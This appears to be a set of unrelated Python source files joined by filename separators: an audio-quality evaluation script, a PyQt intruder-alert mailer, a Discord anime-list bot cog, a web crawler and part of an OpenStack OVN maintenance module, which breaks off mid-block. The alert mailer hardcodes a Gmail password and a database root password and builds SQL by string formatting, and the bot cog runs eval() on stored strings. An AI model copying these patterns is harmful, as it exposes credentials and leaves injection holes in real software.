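        # Standard MCD definition: (10 / ln 10) * sqrt(2 * sum_d (c_d - c'_d)^2),
        # averaged over the DTW-aligned frames; note that as written the 0th
        # (energy) coefficient is included in the sum.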
diff2sum = np.sum((gen_mcep_dtw - gt_mcep_dtw) ** 2, 1)
mcd = np.mean(10.0 / np.log(10.0) * np.sqrt(2 * diff2sum), 0)
logging.info(f"{gt_basename} {mcd:.4f}")
mcd_dict[gt_basename] = mcd
def get_parser() -> argparse.Namespace:
"""Get argument parser."""
parser = argparse.ArgumentParser(description="Evaluate Mel-cepstrum distortion.")
parser.add_argument(
"gen_wavdir_or_wavscp",
type=str,
help="Path of directory or wav.scp for generated waveforms.",
)
parser.add_argument(
"gt_wavdir_or_wavscp",
type=str,
help="Path of directory or wav.scp for ground truth waveforms.",
)
parser.add_argument(
"--outdir",
type=str,
help="Path of directory to write the results.",
)
# analysis related
parser.add_argument(
"--mcep_dim",
default=None,
type=int,
help=(
"Dimension of mel cepstrum coefficients. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--mcep_alpha",
default=None,
type=float,
help=(
"All pass constant for mel-cepstrum analysis. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--n_fft",
default=1024,
type=int,
help="The number of FFT points.",
)
parser.add_argument(
"--n_shift",
default=256,
type=int,
help="The number of shift points.",
)
parser.add_argument(
"--nj",
default=16,
type=int,
help="Number of parallel jobs.",
)
parser.add_argument(
"--verbose",
default=1,
type=int,
help="Verbosity level. Higher is more logging.",
)
return parser
def main():
"""Run MCD calculation in parallel."""
args = get_parser().parse_args()
# logging info
if args.verbose > 1:
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
elif args.verbose > 0:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
logging.basicConfig(
level=logging.WARN,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
logging.warning("Skip DEBUG/INFO messages")
# find files
if os.path.isdir(args.gen_wavdir_or_wavscp):
gen_files = sorted(find_files(args.gen_wavdir_or_wavscp))
else:
with open(args.gen_wavdir_or_wavscp) as f:
gen_files = [line.strip().split(None, 1)[1] for line in f.readlines()]
if gen_files[0].endswith("|"):
raise ValueError("Not supported wav.scp format.")
if os.path.isdir(args.gt_wavdir_or_wavscp):
gt_files = sorted(find_files(args.gt_wavdir_or_wavscp))
else:
with open(args.gt_wavdir_or_wavscp) as f:
gt_files = [line.strip().split(None, 1)[1] for line in f.readlines()]
if gt_files[0].endswith("|"):
raise ValueError("Not supported wav.scp format.")
# Get and divide list
if len(gen_files) == 0:
raise FileNotFoundError("Not found any generated audio files.")
if len(gen_files) > len(gt_files):
raise ValueError(
"#groundtruth files are less than #generated files "
f"(#gen={len(gen_files)} vs. #gt={len(gt_files)}). "
"Please check the groundtruth directory."
)
logging.info("The number of utterances = %d" % len(gen_files))
file_lists = np.array_split(gen_files, args.nj)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
with mp.Manager() as manager:
mcd_dict = manager.dict()
processes = []
for f in file_lists:
p = mp.Process(target=calculate, args=(f, gt_files, args, mcd_dict))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
# convert to standard list
mcd_dict = dict(mcd_dict)
# calculate statistics
mean_mcd = np.mean(np.array([v for v in mcd_dict.values()]))
std_mcd = np.std(np.array([v for v in mcd_dict.values()]))
logging.info(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
# write results
if args.outdir is None:
if os.path.isdir(args.gen_wavdir_or_wavscp):
args.outdir = args.gen_wavdir_or_wavscp
else:
args.outdir = os.path.dirname(args.gen_wavdir_or_wavscp)
os.makedirs(args.outdir, exist_ok=True)
with open(f"{args.outdir}/utt2mcd", "w") as f:
for utt_id in sorted(mcd_dict.keys()):
mcd = mcd_dict[utt_id]
f.write(f"{utt_id} {mcd:.4f}\n")
with open(f"{args.outdir}/mcd_avg_result.txt", "w") as f:
f.write(f"#utterances: {len(gen_files)}\n")
f.write(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
logging.info("Successfully finished MCD evaluation.")
if __name__ == "__main__":
main()
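# Example invocation (hypothetical paths):
#   python evaluate_mcd.py gen_wavs/ gt_wavs/ --outdir results --nj 8
# writes per-utterance scores to results/utt2mcd and the average/std to
# results/mcd_avg_result.txt.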
|
Alert_Area1.py
|
# -*- coding: utf-8 -*-
from PyQt5 import QtCore, QtGui, QtWidgets
import pygame
import pymysql
from PyQt5.QtCore import QTimer
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import multiprocessing
import datetime
class Ui_Alert1(object):
update = 1
count = 0
tw = time.time()
flag = False
def __init__(self, num):
self.num = num
self.timer = QTimer()
# set timer timeout callback function
self.timer.timeout.connect(self.viewcam)
# set control_bt callback clicked function
def viewcam(self):
t1 = time.time()
print('###############',self.num)
if t1 - self.tw >= self.update:
self.count += 1
con = self.num - self.count
self.btn_sndmail.setText('Send Mail ' + str(con))
print(con)
if con == 0:
print('Send Mail')
self.count = 0
self.btn_sndmail.setText('Send')
self.timer.stop()
P1 = multiprocessing.Process(target=self.send_mail)
P1.start()
self.tw = time.time()
def controlTimer(self):
# if timer is stopped
if not self.timer.isActive():
self.timer.start(20)
def stop_(self):
self.btn_sndmail.setText('Send Mail')
self.timer.stop()
def send_mail(self):
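        # Fetch every contact from the `inform` table and mail each one an alert
        # containing the suspect details plus the enrolled and last-match images
        # as attachments.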
connection = pymysql.connect("localhost", "root", "rootpass", "project")
cursor = connection.cursor()
cursor.execute("select count(*) from inform")
row = cursor.fetchone()
total_row = int(row[0])
print('total row', total_row)
name = 'Name : '+self.lineEdit_name.text()+', '
age = 'Age : '+self.lineEdit_age.text()+', '
gender = 'Gender : '+self.lineEdit_gender.text()+', '
citizen = ' Nationality : '+self.lineEdit_nationality.text()+', '
other = 'OtherInfo : '+self.lineEdit_other.text()
table = name+age+gender+citizen+other
cursor.execute("SELECT * FROM inform")
rw = cursor.fetchone()
for i in range(total_row):
email = 'faizk2651@gmail.com'
password = '9892338308'
send_to_email = rw[2]
subject = 'ALERT!'
address = 'Goregaon(W),Patkar College'
            message = rw[1]+', this is an auto-generated mail to alert you that a suspicious person was detected on Date/Time '+self.curr_dt+' at Address: '+address+'. Suspect Information: '+table
files = [self.enrolled_img,self.lastmatch_img]
msg = MIMEMultipart()
msg['To'] = send_to_email
msg['From'] = email
msg['Subject'] = subject
body = MIMEText(message, 'html', 'utf-8')
msg.attach(body) # add message body (text or html)
for f in files: # add files to the message
attachment = MIMEApplication(open(f, "rb").read(), _subtype="txt")
attachment.add_header('Content-Disposition', 'attachment', filename=f)
msg.attach(attachment)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
            server.login(email, password)
text = msg.as_string()
            server.sendmail(email, send_to_email, text)
print(str(i),' ',rw[1])
rw = cursor.fetchone()
server.quit()
def display_profile(self,f_name,f_name2):
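        # Populate the alert form from the `blockacess` table for the matched
        # person, show the enrolled and last-match images, and log the sighting
        # in a background process via view().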
self.curr_dt = str(datetime.datetime.now())
connnection = pymysql.connect("localhost","root","rootpass","project")
cursor = connnection.cursor()
select_query = "select * from blockacess where fname ='%s'" %(f_name)
cursor.execute(select_query)
row = cursor.fetchone()
self.lineEdit_id.setText(str(row[0]))
self.lineEdit_name.setText(row[1])
self.lineEdit_age.setText(row[3])
self.lineEdit_gender.setText(row[4])
self.lineEdit_nationality.setText(row[5])
self.lineEdit_other.setText(row[6])
self.lineEdit_datetime.setText(self.curr_dt)
#self.lineEdit_date.setText(curdate())
#self.lineEdit_time.setText(curtime())
self.enrolled_img = 'Registered/' + f_name + '.jpg'
self.lastmatch_img = 'Monitor/Registered/'+f_name+'/' + f_name2
pixmap = QtGui.QPixmap('Registered/' + f_name + '.jpg')
pixmap = pixmap.scaled(self.label_img1.width(), self.label_img1.height(), QtCore.Qt.KeepAspectRatio)
self.label_img1.setPixmap(pixmap)
self.label_img1.setAlignment(QtCore.Qt.AlignCenter)
pixmap = QtGui.QPixmap('Monitor/Registered/'+f_name+'/' + f_name2)
pixmap = pixmap.scaled(self.label_img2.width(), self.label_img2.height(), QtCore.Qt.KeepAspectRatio)
self.label_img2.setPixmap(pixmap)
self.label_img2.setAlignment(QtCore.Qt.AlignCenter)
P1 = multiprocessing.Process(target=self.view)
P1.start()
def view(self):
ID = int(self.lineEdit_id.text())
connnection = pymysql.connect("localhost", "root", "rootpass", "project")
cursor = connnection.cursor()
select_query = ("select count(*) from view where id =%d") % (ID)
cursor.execute(select_query)
r = cursor.fetchone()
v = int(r[0]) + 1
insert_query = "insert into view(id,curr_time,curr_date,visit) values(%d,curtime(),curdate(),%d)" % (ID, v)
cursor.execute(insert_query)
connnection.commit()
connnection.close()
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(681, 343)
MainWindow.setStyleSheet("*{\n"
" color:rgb(186, 189, 182);\n"
" background:rgb(46, 52, 54);\n"
" font: 12pt \"URW Gothic L\";\n"
"}\n"
"QLineEdit{\n"
" color:rgb(238, 238, 236);\n"
" border:1px solid rgb(186, 189, 182);\n"
" \n"
"}")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label_img1 = QtWidgets.QLabel(self.centralwidget)
self.label_img1.setGeometry(QtCore.QRect(20, 80, 151, 161))
self.label_img1.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img1.setText("")
self.label_img1.setObjectName("label_img1")
self.label_img2 = QtWidgets.QLabel(self.centralwidget)
self.label_img2.setGeometry(QtCore.QRect(190, 80, 151, 161))
self.label_img2.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img2.setText("")
self.label_img2.setObjectName("label_img2")
self.btn_stopsiren = QtWidgets.QPushButton(self.centralwidget)
self.btn_stopsiren.setGeometry(QtCore.QRect(110, 290, 171, 41))
self.btn_stopsiren.setStyleSheet("QPushButton{\n"
" border:1px solid red; \n"
" background:rgb(239, 41, 41);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border:1px solid white;\n"
"}")
self.btn_stopsiren.setObjectName("btn_stopsiren")
self.btn_sndmail = QtWidgets.QPushButton(self.centralwidget)
self.btn_sndmail.setGeometry(QtCore.QRect(360, 290, 181, 41))
self.btn_sndmail.setStyleSheet("QPushButton{\n"
" border:1px solid rgb(52, 101, 164); \n"
" background:rgb(52, 101, 164);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border: 1px solid white;\n"
"}")
self.btn_sndmail.setObjectName("btn_sndmail")
self.lineEdit_id = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_id.setGeometry(QtCore.QRect(390, 60, 41, 21))
self.lineEdit_id.setObjectName("lineEdit_id")
self.lineEdit_name = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_name.setGeometry(QtCore.QRect(520, 60, 141, 21))
self.lineEdit_name.setObjectName("lineEdit_name")
self.lineEdit_age = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_age.setGeometry(QtCore.QRect(410, 100, 51, 21))
self.lineEdit_age.setObjectName("lineEdit_age")
self.lineEdit_gender = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_gender.setGeometry(QtCore.QRect(552, 100, 111, 21))
self.lineEdit_gender.setObjectName("lineEdit_gender")
self.lineEdit_nationality = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_nationality.setGeometry(QtCore.QRect(460, 140, 201, 21))
self.lineEdit_nationality.setObjectName("lineEdit_nationality")
self.lineEdit_other = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_other.setGeometry(QtCore.QRect(450, 180, 211, 21))
self.lineEdit_other.setObjectName("lineEdit_other")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(360, 60, 21, 17))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(460, 60, 51, 17))
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(360, 100, 41, 21))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(480, 100, 67, 17))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(360, 140, 91, 21))
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(360, 180, 81, 17))
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(360, 220, 91, 17))
self.label_9.setObjectName("label_9")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(130, 40, 121, 31))
self.label_11.setStyleSheet("QLabel{\n"
" color:rgb(115, 210, 22);\n"
" border:1px solid red;\n"
"}")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(280, 0, 121, 41))
self.label_12.setStyleSheet("QLabel{\n"
" color:white; \n"
" font: 63 23pt \"URW Gothic L\";\n"
"}")
self.label_12.setObjectName("label_12")
self.lineEdit_datetime = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_datetime.setGeometry(QtCore.QRect(450, 220, 211, 21))
self.lineEdit_datetime.setObjectName("lineEdit_datetime")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(40, 250, 111, 21))
self.label_13.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_13.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(220, 250, 91, 21))
self.label_14.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_14.setObjectName("label_14")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
pygame.mixer.init()
pygame.mixer.music.load('Sound/siren.wav')
pygame.mixer.music.play(0)
self.P2 = multiprocessing.Process(target=self.send_mail)
self.btn_sndmail.clicked.connect(self.P2.start)
self.btn_stopsiren.clicked.connect(self.stop_)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Area-1"))
self.btn_stopsiren.setText(_translate("MainWindow", "Stop Siren/Mail"))
self.btn_sndmail.setText(_translate("MainWindow", "Send Mail"))
self.label_3.setText(_translate("MainWindow", "ID"))
self.label_4.setText(_translate("MainWindow", "Name "))
self.label_5.setText(_translate("MainWindow", "Age"))
self.label_6.setText(_translate("MainWindow", "Gender"))
self.label_7.setText(_translate("MainWindow", "Nationality"))
self.label_8.setText(_translate("MainWindow", "Other Info"))
self.label_9.setText(_translate("MainWindow", "Date/Time"))
self.label_11.setText(_translate("MainWindow", "Match Found"))
self.label_12.setText(_translate("MainWindow", "ALERT!!!"))
self.label_13.setText(_translate("MainWindow", "Enrolled Photo"))
self.label_14.setText(_translate("MainWindow", "Last Match"))
import img
|
usercog.py
|
import io
from datetime import datetime, timedelta
from threading import Thread
import discord
import jikanpy
import timeago
from discord.ext import tasks, commands
from jikanpy import Jikan
from tqdm import tqdm
from naotomori.util import jikanCall
class UserCog(commands.Cog):
"""
UserCog: handles all the user-related logic.
"""
def __init__(self, bot):
"""
Constructor: initialize the cog.
:param bot: The Discord bot.
"""
self.bot = bot
self.discordUser = None
self.malUser = None
self.channel = None
self.jikan = Jikan()
self.progress = io.StringIO("⌛ Please wait a bit")
self.lastUpdated = None
@commands.command(brief='Ping the bot')
async def ping(self, ctx):
"""
Ping the bot.
:param ctx: The context.
"""
await ctx.send(f'Pong: {round(self.bot.latency * 1000)}ms')
def start(self):
"""
Start the UserCog:
- retrieves the user from the database, if possible
- start the updateMalProfileLoop
"""
mal, discord, channel, prefix, anime_source, manga_source, anime_ignored, manga_ignored = self.bot.get_cog('DatabaseCog').getUser()
if mal != '':
try:
self.malUser = self._getMALProfile(mal)
except jikanpy.exceptions.APIException:
pass
self.discordUser = self._getMember(discord)
if channel != '':
self.channel = self._getChannel(channel)
if prefix != '':
self.bot.command_prefix = prefix
if anime_source != '':
self.bot.get_cog('AnimeCog')._setAnimeSource(anime_source)
if manga_source != '':
self.bot.get_cog('MangaCog')._setMangaSource(manga_source)
if anime_ignored != '':
self.bot.get_cog('AnimeCog').ignore = eval(anime_ignored)
if manga_ignored != '':
self.bot.get_cog('MangaCog').ignore = eval(manga_ignored)
if not self.updateMalProfileLoop.is_running():
self.updateMalProfileLoop.start()
def _getMALProfile(self, username):
"""
Get the MyAnimeList user object, given the username.
:param username: The username of the MAL account.
:return: The MAL user.
"""
return jikanCall(self.jikan.user, username=username)
def _updateMALProfile(self, profile):
"""
Update the internal MAL user, i.e. updating the watching/reading list.
:param profile: The username of the MAL account.
"""
try:
newAnimeList = []
newMangaList = []
watching = jikanCall(self.jikan.user, username=profile, request='animelist', argument='watching')['anime']
ptw = jikanCall(self.jikan.user, username=profile, request='animelist', argument='ptw')['anime']
reading = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='reading')['manga']
ptr = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='ptr')['manga']
pbar = None
if self.progress:
# Set up progressbar in case it is the first time setting the user's profile
pbar = tqdm(
total=len(watching) + len(ptw) + len(reading) + len(ptr), file=self.progress, ncols=40,
bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]"
)
for anime in watching + ptw:
anime['title_english'] = jikanCall(self.jikan.anime, id=anime['mal_id'])['title_english']
newAnimeList.append(anime)
if self.progress:
self.progress.truncate(0) # clear previous output
self.progress.seek(0)
pbar.update()
for manga in reading + ptr:
manga['title_english'] = jikanCall(self.jikan.manga, id=manga['mal_id'])['title_english']
newMangaList.append(manga)
if self.progress:
self.progress.truncate(0)
self.progress.seek(0)
pbar.update()
# If for some reason, we cannot retrieve the new lists (e.g. API error), keep the old ones
# In other words, only update the lists if we can retrieve the new ones
if newAnimeList:
self.bot.get_cog('AnimeCog').list = newAnimeList
if newMangaList:
self.bot.get_cog('MangaCog').list = newMangaList
self.lastUpdated = datetime.now()
except Exception as e:
# There's nothing we can do :'(
print(str(e))
if self.progress:
self.progress.close()
self.progress = None # no need in the future (only need progressbar for the first set up)
def _getMember(self, user):
"""
        Get the Discord member object, given its name and tag.
:param user: The user (name + tag).
:return: The member object, if none can be found, return None.
"""
for member in self.bot.get_all_members():
if str(member) == user:
return member
return None
def _getChannel(self, channelName):
"""
        Get the Discord channel object, given the name of the channel.
:param channelName: The name of the channel.
:return: The channel object, if none can be found, return None.
"""
for channel in self.bot.get_all_channels():
if str(channel) == channelName:
return channel
return None
@commands.command(brief='Set your MAL profile')
async def setProfile(self, ctx, profile: str):
"""
Set the internal MAL account, as well as the discord account and bot channel.
:param ctx: The context.
:param profile: Name of the MAL account.
"""
try:
self.malUser = self._getMALProfile(profile)
except jikanpy.exceptions.APIException:
await ctx.send(f'Unable to find user {profile}, make sure the profile is public.')
return
self.progress = io.StringIO("⌛ Please wait a bit") # start new profile
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
self.discordUser = ctx.author
if self.channel is None:
self.channel = ctx.channel
self.bot.get_cog('DatabaseCog').updateValue("channel", str(self.channel))
# Store data in database
self.bot.get_cog('DatabaseCog').setProfile(profile, str(self.discordUser))
thread = Thread(target=self._updateMALProfile, args=(profile,))
thread.start()
await ctx.send(
'🎉 Successfully set profile, you\'ll now receive notifications for new anime episodes and manga chapters!\n'
'🍵 It still may take some time for your profile to update though.'
)
@commands.command(brief='Remove your MAL profile from the bot')
async def removeProfile(self, ctx):
self.bot.get_cog('DatabaseCog').setProfile("", "")
self.discordUser = None
self.malUser = None
self.channel = None
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
await ctx.send('😢 Successfully removed you from the bot!')
@commands.command(brief='Get a brief overview of your MAL profile')
async def getProfile(self, ctx):
"""
        Get the MAL profile in the form of an embed.
:param ctx: The context.
"""
if self.progress and self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="🔧 Setting up profile", value=str(self.progress.getvalue()))
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
elif self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="Currently Watching / Plan-to-Watch Anime",
value=str(len(self.bot.get_cog('AnimeCog').list)), inline=False)
embed.add_field(name="Currently Reading / Plan-to-Read Manga",
value=str(len(self.bot.get_cog('MangaCog').list)), inline=False)
if self.lastUpdated:
now = datetime.now() + timedelta(seconds=60 * 3.4)
embed.set_footer(text=f"Last updated: {timeago.format(self.lastUpdated, now)}")
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
else:
await ctx.send("Profile is not set, please use `!setProfile <USERNAME>` first.")
@commands.command(brief='Set the bot channel (where it will ping you)')
async def setChannel(self, ctx, channel: discord.TextChannel):
"""
Set the bot channel.
:param ctx: The context.
:param channel: Name of the bot channel.
"""
self.channel = channel
self.bot.get_cog('DatabaseCog').updateValue("channel", str(channel))
await ctx.send(f'📺 Successfully set bot channel to {channel.mention}.')
@commands.command(brief='Set the prefix of the bot')
async def setPrefix(self, ctx, prefix: str):
"""
Set the prefix of the bot
:param ctx: The context.
:param prefix: The new prefix for the bot.
"""
self.bot.command_prefix = prefix
self.bot.get_cog('DatabaseCog').updateValue("prefix", prefix)
await ctx.send(f'❗ Successfully set the prefix to `{prefix}`.')
@setChannel.error
async def setChannelError(self, ctx, error):
"""
Error Handler for setChannel.
:param ctx: The context.
:param error: The error raised.
"""
await ctx.send(error.args[0])
@tasks.loop(hours=3)
async def updateMalProfileLoop(self):
"""
Loop that periodically updates the MAL account, i.e. update watching/reading list.
"""
if self.malUser:
thread = Thread(target=self._updateMALProfile, args=(self.malUser['username'],))
thread.start()
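# Wiring sketch (assumed setup, not shown in this file): the bot is expected to
# register this cog alongside the AnimeCog, MangaCog and DatabaseCog it looks up
# via bot.get_cog(...), e.g. bot.add_cog(UserCog(bot)) at startup, and to call
# start() once the bot is ready so the profile update loop begins running.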
|
main.py
|
import threading
from queue import Queue
from spider import Spider
from domain import *
from storage import *
PROJECT_NAME = 'Musketeer'
HOMEPAGE = 'http://www.musketeer-liu.info'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
THREAD_NUMBER = 8
# Thread Queue
queue = Queue()
# Call Spider Class
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# Create worker threads (will die when main exits)
def create_workers():
for _ in range(THREAD_NUMBER):
# work is the function name
t = threading.Thread(target=work)
# thread die when main exits
t.daemon = True
t.start()
# Do the next job in the queue
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name, url)
queue.task_done()
# Each queued link is a new job
def create_jobs():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
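    # queue.join() blocks until every queued link has been processed; crawl()
    # below then re-reads the queue file so newly discovered links get scheduled.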
crawl()
# Check if there are items in the queue, if so crawl them
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links) > 0:
print(str(len(queued_links)) + ' links in the queue')
create_jobs()
# if __name__ == '__main__':
create_workers()
crawl()
|
maintenance.py
|
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import threading
from futurist import periodics
from neutron.common import config as n_conf
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from neutron_lib import worker
from oslo_log import log
from oslo_utils import timeutils
from networking_ovn.common import constants as ovn_const
from networking_ovn.db import maintenance as db_maint
from networking_ovn.db import revision as db_rev
from networking_ovn import ovn_db_sync
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
class MaintenanceWorker(worker.BaseWorker):
def start(self):
super(MaintenanceWorker, self).start()
# NOTE(twilson) The super class will trigger the post_fork_initialize
# in the driver, which starts the connection/IDL notify loop which
# keeps the process from exiting
def stop(self):
"""Stop service."""
super(MaintenanceWorker, self).stop()
def wait(self):
"""Wait for service to complete."""
super(MaintenanceWorker, self).wait()
@staticmethod
def reset():
n_conf.reset_service()
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
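# Typical wiring (a sketch inferred from the classes in this module): the driver
# creates a MaintenanceThread, registers a DBInconsistenciesPeriodics instance
# via add_periodics(), and calls start(); the futurist PeriodicWorker then runs
# the @periodics.periodic methods defined below on their configured intervals.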
class DBInconsistenciesPeriodics(object):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks ?
self._nb_idl = self._ovn_client._nb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip,
'ovn_create': self._ovn_client.create_floatingip,
'ovn_update': self._ovn_client.update_floatingip,
'ovn_delete': self._ovn_client.delete_floatingip,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._get_security_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
def _get_security_group(self, uuid):
return (self._nb_idl.get_address_set(uuid) or
self._nb_idl.get_port_group(uuid))
@property
def has_lock(self):
return not self._idl.is_lock_contended
def _fix_create_update(self, row):
res_map = self._resources_func_map[row.resource_type]
admin_context = n_context.get_admin_context()
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](admin_context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
db_rev.bump_revision(n_obj, row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
                # If the resource exists in the OVN DB but its revision
                # number differs from the Neutron DB, update it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](n_obj)
else:
